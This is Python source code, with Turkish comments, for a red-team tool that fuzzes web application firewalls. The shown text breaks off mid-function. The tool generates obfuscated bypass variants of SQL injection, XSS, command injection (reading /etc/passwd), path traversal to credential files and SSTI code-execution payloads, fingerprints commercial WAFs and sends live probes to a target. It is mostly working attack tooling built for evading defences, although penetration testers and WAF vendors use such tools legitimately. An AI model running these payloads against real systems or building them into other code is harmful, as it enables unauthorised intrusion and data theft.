#!/usr/bin/env python3
"""
WAF Fuzzer v2 — Red Team Edition
Sıfırdan yeniden yazılmış, genişletilmiş mutation engine, body-diff bypass detection,
WAF fingerprinting ve opsiyonel JS challenge (Playwright) desteği ile.

Yalnızca yetkili/izinli ortamlarda kullanılmalıdır.

Kurulum:
    pip install aiohttp rich playwright
    playwright install chromium   # (opsiyonel, --js-challenge için)
"""

import asyncio
import argparse
import sys
import os
import re
import json
import time
import random
import hashlib
import difflib
import unicodedata
from urllib.parse import quote, urlencode
from dataclasses import dataclass, field
from typing import Optional

import aiohttp
from rich.console import Console
from rich.table import Table
from rich.progress import Progress, TextColumn, BarColumn, TimeElapsedColumn, SpinnerColumn
from rich.theme import Theme
from rich.panel import Panel
from rich import box

# ---------------------------------------------------------------------------
# Tema
# ---------------------------------------------------------------------------
custom_theme = Theme({
    "info":      "deep_sky_blue1",
    "warning":   "dark_violet",
    "danger":    "bold red",
    "success":   "bold bright_green",
    "primary":   "deep_sky_blue1",
    "secondary": "dark_violet",
    "muted":     "grey50",
})
console = Console(theme=custom_theme)

# ---------------------------------------------------------------------------
# Sabitler
# ---------------------------------------------------------------------------
USER_AGENTS = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/124.0.0.0 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 Version/17.4 Safari/605.1.15",
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Chrome/124.0.0.0 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0",
    "Mozilla/5.0 (iPhone; CPU iPhone OS 17_4 like Mac OS X) AppleWebKit/605.1.15 Mobile/15E148 Safari/604.1",
    "curl/8.6.0",
    "python-requests/2.31.0",
    "Googlebot/2.1 (+http://www.google.com/bot.html)",
]

# WAF imzaları: header / body / status pattern'leri
WAF_SIGNATURES = {
    "Cloudflare": {
        "headers":  ["cf-ray", "cf-cache-status", "cf-request-id"],
        "body":     ["Cloudflare", "cloudflare", "__cf_chl", "cf-browser-verification"],
        "status":   [403, 503],
    },
    "AWS WAF": {
        "headers":  ["x-amzn-requestid", "x-amz-cf-id"],
        "body":     ["AWS WAF", "Request blocked"],
        "status":   [403],
    },
    "Imperva (Incapsula)": {
        "headers":  ["x-iinfo", "x-cdn"],
        "body":     ["Incapsula incident", "_Incapsula_Resource", "incap_ses"],
        "status":   [403],
    },
    "Akamai": {
        "headers":  ["x-check-cacheable", "akamai-grn", "x-akamai-session-id"],
        "body":     ["Reference #", "Access Denied - Akamai"],
        "status":   [403],
    },
    "ModSecurity": {
        "headers":  ["x-mod-security-message"],
        "body":     ["Mod_Security", "ModSecurity", "This error was generated by Mod_Security"],
        "status":   [403, 406, 501],
    },
    "F5 BIG-IP ASM": {
        "headers":  ["x-cnection", "x-wa-info"],
        "body":     ["The requested URL was rejected", "F5 BIG-IP"],
        "status":   [403],
    },
    "Sucuri": {
        "headers":  ["x-sucuri-id", "x-sucuri-cache"],
        "body":     ["Sucuri WebSite Firewall", "Access Denied - Sucuri"],
        "status":   [403],
    },
    "Barracuda": {
        "headers":  ["barracuda_"],
        "body":     ["Barracuda Web Application Firewall", "barra_counter_session"],
        "status":   [403],
    },
    "Wordfence": {
        "headers":  [],
        "body":     ["Wordfence", "This response was generated by Wordfence", "wfCBL"],
        "status":   [403],
    },
    "Nginx (generic)": {
        "headers":  ["x-nginx"],
        "body":     ["nginx", "400 Bad Request", "403 Forbidden"],
        "status":   [400, 403],
    },
}


# ---------------------------------------------------------------------------
# Yardımcı: Unicode normalizasyon tabloları
# ---------------------------------------------------------------------------
def _build_unicode_alt_map() -> dict[str, list[str]]:
    """
    ASCII karakterleri için görsel/semantik unicode alternatifler.
    Tam bir harita değil — WAF bypass'ta kullanılan yaygın olanlar.
    """
    return {
        "a": ["\u0430", "\u0061", "\uFF41"],   # Cyrillic a, Latin a, Fullwidth a
        "e": ["\u0435", "\uFF45"],
        "o": ["\u043E", "\uFF4F", "\u00F8"],
        "s": ["\u0455", "\uFF53"],
        "c": ["\u0441", "\uFF43"],
        "i": ["\u0456", "\uFF49"],
        "p": ["\u0440", "\uFF50"],
        "<": ["\uFE64", "\u02C2"],
        ">": ["\uFE65", "\u02C3"],
        "'": ["\u2018", "\u2019", "\uFF07"],
        "\"": ["\u201C", "\u201D", "\uFF02"],
        "/": ["\u2215", "\uFF0F"],
        " ": ["\u00A0", "\u2009", "\u200A"],
    }

UNICODE_ALT = _build_unicode_alt_map()


# ---------------------------------------------------------------------------
# MutationEngine — Tam genişletilmiş
# ---------------------------------------------------------------------------
class MutationEngine:
    """
    Her payload için 10+ farklı obfuscation kategorisinden varyant üretir.
    Context: sqli | xss | cmdi | path | ssti | general
    """

    @staticmethod
    def generate(baseline: str, context: str = "general") -> list[str]:
        muts: set[str] = set()
        muts.add(baseline)

        # --- 1. Encoding katmanları ---
        muts.update(MutationEngine._encodings(baseline))

        # --- 2. Space obfuscation ---
        muts.update(MutationEngine._space_subs(baseline))

        # --- 3. Case permütasyonları ---
        muts.update(MutationEngine._case_perms(baseline))

        # --- 4. Null byte / kontrolcü karakterler ---
        muts.update(MutationEngine._null_and_control(baseline))

        # --- 5. HPP (HTTP Parameter Pollution) ---
        muts.update(MutationEngine._hpp(baseline))

        # --- 6. Unicode alternatifleri ---
        muts.update(MutationEngine._unicode_alts(baseline))

        # --- 7. Comment injection (SQL/JS stili) ---
        muts.update(MutationEngine._comment_inject(baseline))

        # --- 8. Chunked / line folding ---
        muts.update(MutationEngine._line_folding(baseline))

        # --- Context'e özel ---
        if context == "sqli":
            muts.update(MutationEngine._sqli(baseline))
        elif context == "xss":
            muts.update(MutationEngine._xss(baseline))
        elif context == "cmdi":
            muts.update(MutationEngine._cmdi(baseline))
        elif context == "path":
            muts.update(MutationEngine._path_traversal(baseline))
        elif context == "ssti":
            muts.update(MutationEngine._ssti(baseline))

        # None / boş stringleri çıkar
        return [m for m in muts if m and m.strip()]

    # -----------------------------------------------------------------------
    @staticmethod
    def _encodings(p: str) -> list[str]:
        variants = []
        # URL encode
        variants.append(quote(p, safe=""))
        # Double URL encode
        variants.append(quote(quote(p, safe=""), safe=""))
        # Triple URL encode (nadir ama bazı WAF'lar 3 tur decode yapar)
        variants.append(quote(quote(quote(p, safe=""), safe=""), safe=""))
        # Hex encode her karakter: \xNN
        variants.append("".join(f"\\x{ord(c):02x}" for c in p))
        # HTML entity (decimal)
        variants.append("".join(f"&#{ord(c)};" for c in p))
        # HTML entity (hex)
        variants.append("".join(f"&#x{ord(c):02x};" for c in p))
        # Base64 — bazı WAF'lar decoded body üzerinde çalışmaz
        import base64
        b64 = base64.b64encode(p.encode()).decode()
        variants.append(b64)
        variants.append(f"base64_decode('{b64}')")
        # Octal (JS tarzı)
        variants.append("".join(f"\\{ord(c):03o}" for c in p))
        # UTF-16 surrogate pairs (bazı parser'lar)
        try:
            utf16 = p.encode("utf-16-le")
            variants.append("%u" + "%u".join(f"{utf16[i]:02x}{utf16[i+1]:02x}" for i in range(0, len(utf16), 2)))
        except Exception:
            pass
        return variants

    @staticmethod
    def _space_subs(p: str) -> list[str]:
        if " " not in p:
            return []
        subs = ["/**/", "%09", "%0A", "%0D", "%0C", "%0B", "+", "\t", "\r\n\t", "/*!*/"]
        return [p.replace(" ", s) for s in subs]

    @staticmethod
    def _case_perms(p: str) -> list[str]:
        variants = [p.upper(), p.lower()]
        # Alternatif büyük/küçük (2 yön)
        variants.append("".join(c.upper() if i % 2 == 0 else c.lower() for i, c in enumerate(p)))
        variants.append("".join(c.lower() if i % 2 == 0 else c.upper() for i, c in enumerate(p)))
        # Random case (3 farklı örnek)
        for _ in range(3):
            variants.append("".join(random.choice([c.upper(), c.lower()]) for c in p))
        return variants

    @staticmethod
    def _null_and_control(p: str) -> list[str]:
        variants = []
        for nb in ["%00", "\x00", "%u0000", "\\0"]:
            variants.append(p + nb)
            variants.append(nb + p)
            # Ortasına enjekte (ilk boşluğa ya da ikinci karaktere)
            mid = len(p) // 2
            variants.append(p[:mid] + nb + p[mid:])
        # Unicode BOM
        variants.append("\ufeff" + p)
        variants.append(p + "\ufeff")
        return variants

    @staticmethod
    def _hpp(p: str) -> list[str]:
        variants = []
        decoys = ["safe_val", "normal_input", "test123", "hello"]
        for d in decoys:
            variants.append(f"{d}=ok&payload={quote(p, safe='')}")
            variants.append(f"payload={quote(p, safe='')}&{d}=ok")
        return variants

    @staticmethod
    def _unicode_alts(p: str) -> list[str]:
        """Her karakteri unicode alternatifiyle değiştiren tek tek varyantlar üretir."""
        variants = []
        for i, ch in enumerate(p):
            alts = UNICODE_ALT.get(ch.lower(), [])
            for alt in alts:
                new = p[:i] + alt + p[i+1:]
                variants.append(new)
        # NFC / NFKC normalizasyon sonrası (bazı WAF'lar normalize eder, sunucu etmeyebilir)
        try:
            variants.append(unicodedata.normalize("NFKC", p))
            variants.append(unicodedata.normalize("NFC", p))
        except Exception:
            pass
        return variants

    @staticmethod
    def _comment_inject(p: str) -> list[str]:
        """Kelimeler arasına SQL/JS/HTML comment enjekte et."""
        variants = []
        words = p.split(" ")
        if len(words) < 2:
            return []
        # SQL: SELECT/**/FROM
        for comment in ["/**/", "/*!*/", "/*!\n*/", "-- \n", "#\n"]:
            variants.append(comment.join(words))
        # HTML comment: se<!--x-->lect
        if len(words[0]) > 2:
            w = words[0]
            mid = len(w) // 2
            variants.append(w[:mid] + "<!--x-->" + w[mid:] + " " + " ".join(words[1:]))
        return variants

    @staticmethod
    def _line_folding(p: str) -> list[str]:
        """HTTP header line folding / CRLF injection denemeleri."""
        return [
            p.replace(" ", "\r\n "),       # RFC 2822 line folding
            p + "\r\n X-Injected: true",   # header injection attempt
            p + "%0d%0aX-Injected:%20true",
        ]

    # -----------------------------------------------------------------------
    # CONTEXT: SQL Injection
    # -----------------------------------------------------------------------
    @staticmethod
    def _sqli(p: str) -> list[str]:
        variants = []
        upper = p.upper()

        # Operator substitution
        for old, new in [("OR", "||"), ("AND", "&&"), ("=", " LIKE "),
                         ("!=", "<>"), ("UNION", "UNION ALL"), ("SELECT", "SEL\x00ECT")]:
            if old in upper:
                variants.append(re.sub(re.escape(old), new, p, flags=re.IGNORECASE))

        # Tautology varyantları
        tautologies = [
            "' OR '1'='1", "' OR 1=1--", "1' OR '1'='1'--",
            "' OR 1=1#", "' OR 1=1/*", "\" OR \"1\"=\"1",
            "1 OR 1=1", "1' OR 1=1 LIMIT 1--",
        ]
        variants.extend(tautologies)

        # Stacked query denemeleri
        variants.extend([p + ";--", p + "; SELECT 1--", p + "; WAITFOR DELAY '0:0:5'--"])

        # Time-based blind
        variants.extend([
            p + " AND SLEEP(5)--",
            p + " AND 1=BENCHMARK(5000000,MD5(1))--",
            p + "'; WAITFOR DELAY '0:0:5'--",
            p + " OR pg_sleep(5)--",
        ])

        # Error-based
        variants.extend([
            p + " AND EXTRACTVALUE(1,CONCAT(0x7e,VERSION()))--",
            p + " AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(VERSION(),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--",
        ])

        # WAF bypass: inline comments içinde keyword gizle
        for kw in ["SELECT", "UNION", "FROM", "WHERE", "AND", "OR"]:
            if kw in upper:
                hidden = f"/*!{kw}*/"
                variants.append(re.sub(kw, hidden, p, flags=re.IGNORECASE))

        # Hex string literals (MySQL)
        variants.append(p.replace("'", "0x" + p.encode().hex()))

        return variants

    # -----------------------------------------------------------------------
    # CONTEXT: XSS
    # -----------------------------------------------------------------------
    @staticmethod
    def _xss(p: str) -> list[str]:
        variants = []

        # HTML entity encoding kısmî
        variants.append(p.replace("<", "&lt;").replace(">", "&gt;"))
        variants.append(p.replace("<", "\u003c").replace(">", "\u003e"))
        variants.append(p.replace("<", "%3C").replace(">", "%3E"))

        # Script tag varyantları
        script_variants = [
            "<ScRiPt>alert(1)</sCrIpT>",
            "<script/x>alert(1)</script>",
            "<script\t>alert(1)</script>",
            "<script\r\n>alert(1)</script>",
            "<%00script>alert(1)</script>",
            "<scr\x00ipt>alert(1)</scr\x00ipt>",
            "<scr<!---->ipt>alert(1)</sc<!---->ript>",
        ]
        variants.extend(script_variants)

        # Event handler varyantları
        events = [
            "<img src=x onerror=alert(1)>",
            "<img src=x oNeRrOr=alert(1)>",
            "<img/src=x/onerror=alert(1)>",
            "<svg onload=alert(1)>",
            "<svg/onload=alert(1)>",
            "<body onload=alert(1)>",
            "<iframe src=javascript:alert(1)>",
            "<a href=javascript:alert(1)>X</a>",
            "<input autofocus onfocus=alert(1)>",
            "<details open ontoggle=alert(1)>",
            "<video src=x onerror=alert(1)>",
            "<audio src=x onerror=alert(1)>",
        ]
        variants.extend(events)

        # JS template literal
        variants.extend([
            "${alert(1)}",
            "{{constructor.constructor('alert(1)')()}}",  # Angular SSTI/XSS
            "#{alert(1)}",                                 # Ruby template
        ])

        # Data URI
        variants.extend([
            "<iframe src='data:text/html,<script>alert(1)</script>'>",
            "<img src=data:image/svg+xml;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSkv Pg==>",
        ])

        # CSS injection
        variants.extend([
            "<style>@import'javascript:alert(1)'</style>",
            "<link rel=stylesheet href=javascript:alert(1)>",
        ])

        # Payload wrapping
        variants.extend([
            f"\"><script>alert(1)</script>",
            f"'><script>alert(1)</script>",
            f"</title><script>alert(1)</script>",
            f"\";alert(1);//",
        ])

        # Mevcut payload üzerine case/encoding uygula
        if "onerror" in p.lower():
            variants.append(p.replace("onerror", "oNeRrOr").replace("onload", "oNlOaD"))
        if "<script>" in p.lower():
            variants.append(p.replace("<script>", "<sCrIpT>").replace("</script>", "</sCrIpT>"))

        return variants

    # -----------------------------------------------------------------------
    # CONTEXT: Command Injection
    # -----------------------------------------------------------------------
    @staticmethod
    def _cmdi(p: str) -> list[str]:
        variants = []
        separators = [";", "&&", "||", "|", "`", "$(", "\n", "%0A", "%3B"]
        commands = ["id", "whoami", "cat /etc/passwd", "ls", "dir"]

        for sep in separators:
            for cmd in commands:
                variants.extend([
                    f"{p}{sep}{cmd}",
                    f"{sep}{cmd}",
                    f"{p} {sep} {cmd}",
                ])

        # Obfuscation: IFS separator (bash)
        variants.extend([
            "${IFS}cat${IFS}/etc/passwd",
            "c'a't${IFS}/etc/passwd",
            "c\"a\"t /etc/passwd",
            "c\\at /etc/passwd",
        ])

        # Hex command execution (bash)
        cmd_hex = "".join(f"\\x{ord(c):02x}" for c in "id")
        variants.append(f'$\'\\x{cmd_hex}\'')

        # Wildcard bypass
        variants.extend(["/???/??t /???/p?ss?d", "/bin/c?t /etc/pass??"])

        # Encoded operators
        variants.extend([f"{p}%7c{cmd}" for cmd in commands])
        variants.extend([f"{p}%26%26{cmd}" for cmd in commands])

        return variants

    # -----------------------------------------------------------------------
    # CONTEXT: Path Traversal
    # -----------------------------------------------------------------------
    @staticmethod
    def _path_traversal(p: str) -> list[str]:
        base = "../" * 6 + "etc/passwd"
        variants = []
        traversals = [
            "../" * 6,
            "..%2F" * 6,
            "..%252F" * 6,          # double encoded
            "..%c0%af" * 6,         # overlong UTF-8
            "..%c1%9c" * 6,
            "....//....//....//",    # stripped ../ bypass
            "%2e%2e%2f" * 6,
            "%2e%2e/" * 6,
            "..%5c" * 6,            # Windows backslash
            "..%255c" * 6,
        ]
        targets = ["etc/passwd", "etc/shadow", "windows/win.ini",
                   "windows/system32/drivers/etc/hosts", "proc/self/environ"]

        for trav in traversals:
            for tgt in targets:
                variants.append(trav + tgt)

        # Absolute path bypass
        variants.extend([
            "/etc/passwd",
            "/etc/shadow",
            "file:///etc/passwd",
            "php://filter/convert.base64-encode/resource=/etc/passwd",
        ])

        # Null byte termination
        variants.extend([base + "%00.jpg", base + "\x00.png"])

        return variants

    # -----------------------------------------------------------------------
    # CONTEXT: SSTI (Server-Side Template Injection)
    # -----------------------------------------------------------------------
    @staticmethod
    def _ssti(p: str) -> list[str]:
        # Yaygın SSTI probe payloadları (Jinja2, Twig, Freemarker, Velocity, Thymeleaf)
        return [
            "{{7*7}}",
            "${7*7}",
            "<%= 7*7 %>",
            "#{7*7}",
            "*{7*7}",
            "{{7*'7'}}",
            "{{config}}",
            "{{self}}",
            "{{''.class.mro[2].subclasses()}}",
            "{{''.__class__.__mro__[2].__subclasses__()}}",
            "${{7*7}}",
            "%{{7*7}}",
            "{{_self.env.registerUndefinedFilterCallback('exec')}}{{_self.env.getFilter('id')}}",
            "<#assign ex='freemarker.template.utility.Execute'?new()>${ex('id')}",
            "#set($x='')#set($rt=$x.class.forName('java.lang.Runtime'))#set($chr=$x.class.forName('java.lang.Character'))#set($str=$x.class.forName('java.lang.String'))#set($ex=$rt.getRuntime().exec('id'))$ex",
        ]


# ---------------------------------------------------------------------------
# WAF Fingerprinting
# ---------------------------------------------------------------------------
class WAFFingerprinter:
    """
    İki aşamalı WAF tespiti:
    1. Pasif: Header / body / status imza eşleşmesi
    2. Davranışsal: Blok davranışı pattern'lerini analiz et
       - Hangi payloadları blokluyor, hangilerini geçiriyor?
       - Block mesajının yapısı (JSON mu, HTML mi, custom mu?)
       - Rate limiting davranışı var mı?
       - Response süresi tutarlı mı? (learning mode tespiti)
    """

    # Davranışsal imzalar — her WAF'ın blok mesajı farklı yapıda
    BEHAVIORAL_SIGNATURES = {
        "Cloudflare": {
            "block_body_patterns": [
                r"cloudflare",
                r"__cf_chl",
                r"cf-browser-verification",
                r"<title>.*?attention required.*?</title>",
                r"ray\s+id:\s*[a-f0-9]+",
            ],
            "block_content_type": None,   # HTML veya JSON olabilir
            "js_challenge": True,
        },
        "AWS WAF": {
            "block_body_patterns": [
                r"aws\s+waf",
                r'"message"\s*:\s*"forbidden"',
                r"request\s+blocked",
            ],
            "block_content_type": "application/json",
            "js_challenge": False,
        },
        "Imperva (Incapsula)": {
            "block_body_patterns": [
                r"incapsula\s+incident",
                r"_incapsula_resource",
                r"incap_ses",
                r"visid_incap",
            ],
            "block_content_type": None,
            "js_challenge": True,
        },
        "ModSecurity": {
            "block_body_patterns": [
                r"mod_security",
                r"modsecurity",
                r"this\s+error\s+was\s+generated\s+by\s+mod_security",
                r"406\s+not\s+acceptable",
            ],
            "block_content_type": "text/html",
            "js_challenge": False,
        },
        "Akamai": {
            "block_body_patterns": [
                r"reference\s+#",
                r"access\s+denied.*?akamai",
                r"akamai-grn",
            ],
            "block_content_type": "text/html",
            "js_challenge": False,
        },
        "F5 BIG-IP ASM": {
            "block_body_patterns": [
                r"the\s+requested\s+url\s+was\s+rejected",
                r"f5\s+big-?ip",
                r"support\s+id:",
            ],
            "block_content_type": "text/html",
            "js_challenge": False,
        },
        "Sucuri": {
            "block_body_patterns": [
                r"sucuri\s+website\s+firewall",
                r"access\s+denied\s*-\s*sucuri",
                r"generated\s+by\s+sucuri",
            ],
            "block_content_type": "text/html",
            "js_challenge": False,
        },
    }

    @staticmethod
    def fingerprint(status: int, headers: dict, body: str) -> list[tuple[str, int]]:
        """
        Pasif fingerprint: header/body/status imza eşleşmesi.
        Returns: [(waf_name, confidence_pct), ...]  en yüksekten en düşüğe
        """
        scores: dict[str, int] = {}
        lower_body = body.lower()
        lower_headers = {k.lower(): v.lower() for k, v in headers.items()}

        for waf_name, sigs in WAF_SIGNATURES.items():
            score = 0

            # Header eşleşmesi (ağırlık: 3)
            for h in sigs["headers"]:
                if any(h.lower() in k for k in lower_headers):
                    score += 3

            # Body eşleşmesi (ağırlık: 2)
            for b in sigs["body"]:
                if b.lower() in lower_body:
                    score += 2

            # Status code eşleşmesi (ağırlık: 1)
            if status in sigs["status"]:
                score += 1

            if score > 0:
                scores[waf_name] = score

        # Davranışsal analiz ile ek puan
        behavioral_scores = WAFFingerprinter._behavioral_score(status, headers, body)
        for waf_name, extra in behavioral_scores.items():
            scores[waf_name] = scores.get(waf_name, 0) + extra

        if not scores:
            return []

        max_score = max(scores.values())
        result = []
        for name, s in sorted(scores.items(), key=lambda x: x[1], reverse=True):
            pct = min(int((s / max(max_score, 1)) * 100), 99)
            result.append((name, pct))

        return result

    @staticmethod
    def _behavioral_score(status: int, headers: dict, body: str) -> dict[str, int]:
        """
        Block response'un yapısını analiz ederek davranışsal puanlar üret.
        """
        scores: dict[str, int] = {}
        lower_body = body.lower()
        content_type = headers.get("Content-Type", headers.get("content-type", "")).lower()

        for waf_name, bsig in WAFFingerprinter.BEHAVIORAL_SIGNATURES.items():
            score = 0

            # Body pattern regex eşleşmesi (ağırlık: 4 — çok spesifik)
            for pattern in bsig["block_body_patterns"]:
                if re.search(pattern, lower_body, re.I | re.S):
                    score += 4

            # Content-Type eşleşmesi (ağırlık: 2)
            if bsig["block_content_type"] and bsig["block_content_type"] in content_type:
                score += 2

            if score > 0:
                scores[waf_name] = score

        return scores

    @classmethod
    async def behavioral_probe(cls, session: aiohttp.ClientSession,
                                base_url: str, headers: dict, cookies: dict,
                                proxy: str | None, timeout: int) -> dict:
        """
        Aktif davranışsal analiz — 3 farklı payload göndererek WAF davranışını ölç.
        
        Returns: {
            "block_rate": float,          # kaç payload bloklandı (0.0-1.0)
            "avg_block_time_ms": float,   # ortalama blok süresi
            "avg_pass_time_ms": float,    # ortalama geçiş süresi
            "consistent_timing": bool,    # timing tutarlı mı (learning mode değil)
            "learning_mode_suspected": bool,
            "rate_limit_detected": bool,
            "notes": list[str],
        }
        """
        PROBE_PAYLOADS = [
            ("benign",    "safe_test_string_123"),
            ("sqli",      "' OR '1'='1'--"),
            ("xss",       "<script>alert(1)</script>"),
            ("cmdi",      "; id"),
            ("path",      "../../etc/passwd"),
            ("sqli2",     "1 UNION SELECT 1,2,3--"),
        ]

        results = []
        rate_limited = False

        for label, payload in PROBE_PAYLOADS:
            safe_p = payload.replace(" ", "%20")
            sep = "&" if "?" in base_url else "?"
            target = base_url.replace("FUZZ", safe_p) if "FUZZ" in base_url else f"{base_url}{sep}q={safe_p}"

            t0 = time.monotonic()
            try:
                async with session.get(
                    target, headers=headers, cookies=cookies,
                    proxy=proxy, ssl=False if proxy else None,
                    timeout=aiohttp.ClientTimeout(total=timeout),
                    allow_redirects=False,
                ) as resp:
                    elapsed_ms = (time.monotonic() - t0) * 1000
                    body = await resp.text(errors="replace")
                    results.append({
                        "label":      label,
                        "status":     resp.status,
                        "elapsed_ms": elapsed_ms,
                        "blocked":    resp.status in [403, 406, 429, 503],
                    })
                    if resp.status == 429:
                        rate_limited = True
            except Exception:
                results.append({"label": label, "status": -1, "elapsed_ms": 0, "blocked": False})

        # Analiz
        blocked = [r for r in results if r["blocked"]]
        passed  = [r for r in results if not r["blocked"] and r["status"] > 0]
        block_rate = len(blocked) / len(results) if results else 0

        avg_block_time = sum(r["elapsed_ms"] for r in blocked) / max(len(blocked), 1)
        avg_pass_time  = sum(r["elapsed_ms"] for r in passed) / max(len(passed), 1)

        # Timing tutarlılığı — standart sapma düşükse tutarlı
        if blocked:
            times = [r["elapsed_ms"] for r in blocked]
            mean = sum(times) / len(times)
            variance = sum((t - mean) ** 2 for t in times) / len(times)
            std_dev = variance ** 0.5
            consistent_timing = std_dev < 50  # 50ms tolerans
        else:
            consistent_timing = True

        # Learning mode şüphesi: benign ve malicious aynı süre alıyorsa WAF inceliyor olabilir
        learning_suspected = False
        if avg_block_time > 0 and avg_pass_time > 0:
            time_ratio = avg_block_time / avg_pass_time
            if 0.8 < time_ratio < 1.2 and block_rate < 0.5:
                learning_suspected = True

        notes = []
        if rate_limited:
            notes.append("Rate limiting aktif (HTTP 429 alındı)")
        if learning_suspected:
            notes.append(f"WAF learning mode şüpheli (blok/geçiş süre oranı: {time_ratio:.2f})")
        if block_rate == 0 and len(PROBE_PAYLOADS) > 2:
            notes.append("WAF yok veya hiçbir probe bloklunmadı")
        if block_rate > 0.8:
            notes.append(f"Çok agresif WAF — probe'ların %{block_rate*100:.0f}'i bloklandı")

        return {
            "block_rate":               block_rate,
            "avg_block_time_ms":        round(avg_block_time, 1),
            "avg_pass_time_ms":         round(avg_pass_time, 1),
            "consistent_timing":        consistent_timing,
            "learning_mode_suspected":  learning_suspected,
            "rate_limit_detected":      rate_limited,
            "notes":                    notes,
        }

    @staticmethod
    def display(results: list[tuple[str, int]], behavioral: dict | None = None):
        if not results:
            console.print("[muted]WAF tespiti yapılamadı veya WAF yok.[/muted]")
        else:
            console.print("\n[primary]── WAF Fingerprint ──────────────────────────────[/primary]")
            for name, conf in results:
                bar = "█" * (conf // 10) + "░" * (10 - conf // 10)
                color = "success" if conf >= 70 else "warning" if conf >= 40 else "muted"
                console.print(f"  [{color}]{name:25s}[/{color}] {bar} {conf}%")
            console.print()

        # Davranışsal analiz sonuçları
        if behavioral:
            console.print("[primary]── Davranışsal Analiz ────────────────────────────[/primary]")
            br = behavioral["block_rate"]
            br_color = "danger" if br > 0.7 else "warning" if br > 0.3 else "success"
            console.print(f"  Blok oranı       [{br_color}]{br*100:.0f}%[/{br_color}]")
            console.print(f"  Blok süresi      {behavioral['avg_block_time_ms']:.0f}ms  |  Geçiş süresi: {behavioral['avg_pass_time_ms']:.0f}ms")

            if behavioral["rate_limit_detected"]:
                console.print("  [warning]⚠ Rate limiting tespit edildi[/warning]")
            if behavioral["learning_mode_suspected"]:
                console.print("  [warning]⚠ WAF learning mode şüpheli — sonuçlar değişken olabilir[/warning]")
            for note in behavioral["notes"]:
                console.print(f"  [muted]• {note}[/muted]")
            console.print()


# ---------------------------------------------------------------------------
# Bypass Detection — Body Diff tabanlı
# ---------------------------------------------------------------------------
@dataclass
class BaselineProfile:
    status: int
    length: int
    body_hash: str          # SHA256 of response body
    body_sample: str        # İlk 512 karakter
    headers: dict           = field(default_factory=dict)
    blocked_keywords: list  = field(default_factory=list)

class BypassDetector:
    """
    Bir response'un gerçekten bypass mı yoksa false positive mi olduğunu belirler.
    
    Yöntemler:
    1. Status code farkı
    2. Body hash farkı — dinamik içerik normalize edilerek (CSRF token, timestamp, nonce)
    3. Response length delta (>%20 fark) — dinamik uzunluk toleransı ile
    4. Benign body keyword eşleşmesi
    5. Blocked keyword yokluğu
    """

    # Bloklama sayfalarında sıkça geçen kelimeler
    BLOCK_KEYWORDS = [
        "blocked", "forbidden", "access denied", "not allowed", "firewall",
        "waf", "security", "rejected", "illegal", "attack", "malicious",
        "request id", "reference #", "incident", "violation",
    ]

    # Dinamik içerik pattern'leri — bu değerler her istekte değişir, hash karşılaştırmasını bozar
    # Normalize ederek sabit placeholder ile değiştiriyoruz
    DYNAMIC_PATTERNS = [
        # CSRF token'lar
        (re.compile(r'<input[^>]+name=["\']?_?csrf[_-]?token["\']?[^>]+value=["\']([^"\']+)["\']', re.I), 'CSRF_TOKEN'),
        (re.compile(r'<input[^>]+value=["\']([^"\']{20,})["\'][^>]+name=["\']?_?csrf', re.I), 'CSRF_TOKEN'),
        (re.compile(r'"csrf[_-]?token"\s*:\s*"([^"]+)"', re.I), 'CSRF_TOKEN'),
        (re.compile(r'name="__RequestVerificationToken"[^>]+value="([^"]+)"', re.I), 'CSRF_TOKEN'),
        # Timestamp / nonce değerleri
        (re.compile(r'"nonce"\s*:\s*"([a-f0-9]{8,})"', re.I), 'NONCE'),
        (re.compile(r'nonce="([a-f0-9]{8,})"', re.I), 'NONCE'),
        (re.compile(r'"timestamp"\s*:\s*\d{10,13}', re.I), '"timestamp":TS'),
        (re.compile(r'<meta[^>]+name=["\']?timestamp["\']?[^>]+content=["\'](\d+)["\']', re.I), 'TS'),
        # Session ID'ler (hidden input)
        (re.compile(r'<input[^>]+type=["\']hidden["\'][^>]+value=["\']([a-f0-9]{32,})["\']', re.I), 'SESSION'),
        # UUID / random token formatlar
        (re.compile(r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}', re.I), 'UUID'),
        # Unix timestamp (10 hane sayı — URL veya JSON içinde)
        (re.compile(r'\b1[0-9]{9}\b'), 'UNIXTS'),
        # Cloudflare ray ID
        (re.compile(r'Ray ID:\s*[a-f0-9]+', re.I), 'CF_RAY'),
        # ViewState (ASP.NET)
        (re.compile(r'<input[^>]+id=["\']?__VIEWSTATE["\']?[^>]+value=["\']([^"\']{20,})["\']', re.I), 'VIEWSTATE'),
    ]

    def __init__(self, benign_profile: BaselineProfile, blocked_profile: BaselineProfile):
        self.benign = benign_profile
        self.blocked = blocked_profile
        # Normalize edilmiş baseline hash'lerini hesapla (bir kez)
        self._blocked_norm_hash = self._norm_hash(blocked_profile.body_sample)
        self._benign_norm_body  = self._normalize(benign_profile.body_sample)

    @classmethod
    def _normalize(cls, body: str) -> str:
        """
        Dinamik içerikleri sabit placeholder ile değiştirerek body'yi normalize eder.
        Böylece CSRF token / timestamp farklılıkları false positive üretmez.
        """
        normalized = body
        for pattern, placeholder in cls.DYNAMIC_PATTERNS:
            normalized = pattern.sub(placeholder, normalized)
        return normalized

    @classmethod
    def _norm_hash(cls, body: str) -> str:
        return hashlib.sha256(cls._normalize(body).encode(errors="replace")).hexdigest()

    def _dynamic_length_tolerance(self, body: str) -> int:
        """
        Body içindeki dinamik alan sayısına göre uzunluk toleransını hesaplar.
        Her dinamik alan ortalama 40 byte etki yaratabilir.
        """
        count = 0
        for pattern, _ in self.DYNAMIC_PATTERNS:
            count += len(pattern.findall(body))
        return count * 40  # byte cinsinden ek tolerans

    def analyze(self, payload: str, status: int, length: int, body: str) -> dict | None:
        """
        Returns: {
            "bypass": bool,
            "confidence": int (0-100),
            "reasons": list[str]
        }
        Returns None for rate-limited (429) responses — not a bypass.
        """
        # 429: Rate limit — bypass değil, atla
        if status == 429:
            return None

        reasons = []
        bypass_signals = 0
        total_signals = 5

